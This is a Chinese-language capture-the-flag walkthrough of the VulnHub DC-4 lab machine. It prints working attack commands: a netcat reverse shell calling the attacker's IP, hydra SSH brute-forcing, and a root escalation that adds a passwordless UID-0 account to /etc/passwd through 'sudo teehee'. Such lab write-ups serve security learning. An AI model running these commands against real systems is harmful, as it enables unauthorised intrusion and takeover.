总结:爆破,teehee提权
目录
下载地址
漏洞分析
信息收集
密码爆破
命令执行
编辑
ssh爆破
提权
下载地址
- DC-4.zip (Size: 617 MB)
- Download: http://www.five86.com/downloads/DC-4.zip
- Download (Mirror): https://download.vulnhub.com/dc/DC-4.zip
使用方法:解压后,使用vm直接打开ova文件。
漏洞分析
信息收集
这里还是使用DC-1的方法
1.给靶机设置一个快照
2.fping -agq 192.168.1.0/24 使用fping快速扫描该网段中存活的机子
3.将靶机关闭重新扫描一下,对比少的那个ip就是靶机的ip
4.使用快照快速将靶机恢复
注:ip段要看自己的
这里也是只发现了22端口和80端口,这里看看网站。
密码爆破
这里发现有一个登录的网页,这里首先我们尝试尝试一些普通的弱口令,这里没有成功,我们这里使用burp来爆破admin密码。
这里我们知道了,后台密码是happy
admin:happy
命令执行
这里我们发现里执行了命令,直接通过hackbar,拦截看看有没有操作的空间
这里我们发现了,这里参数是设置好了,我们可以任意修改的,但是这里我hackbar好像有点问题,这里就使用burp吧。
这里发现是可以执行的,接下来我们可以尝试反弹shell,这里直接使用nc就可以反弹成功
nc -e /bin/bash 192.168.1.12 4444 //这里ip和端口要看自己
ssh爆破
因为在根目录以及当前目录都没有发现什么东西,suid也看看了没有发现什么东西,这里去看看用户目录/home,charles是空,然后jim目录中发现一个字典,这里爆破一下这三个用户。
//生成一个账号文件
echo "chales\njim\nsam" > user.txt
//这里将那个密码文件放到一个新的密码文件中,叫passwd.txt
//接下来爆破ssh密码
hydra -L user.txt -P passwd.txt -v 192.168.1.13 ssh -t 30
这里爆破出来了jim用户密码,这里我们ssh登录
jim:jibril04
这里找了半天不知道那里有提示,这里去找找别人的wp看看,才知道了,是登录是有提示,在这里。
这里来的/var/mail目录中,发现了两个文件,这里看看jim文件,发现了Charles用户的密码
提权
这里我们查看teehee的提权方式。
//teehee提权
echo "raaj::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
//su来到raaj用户
su raaj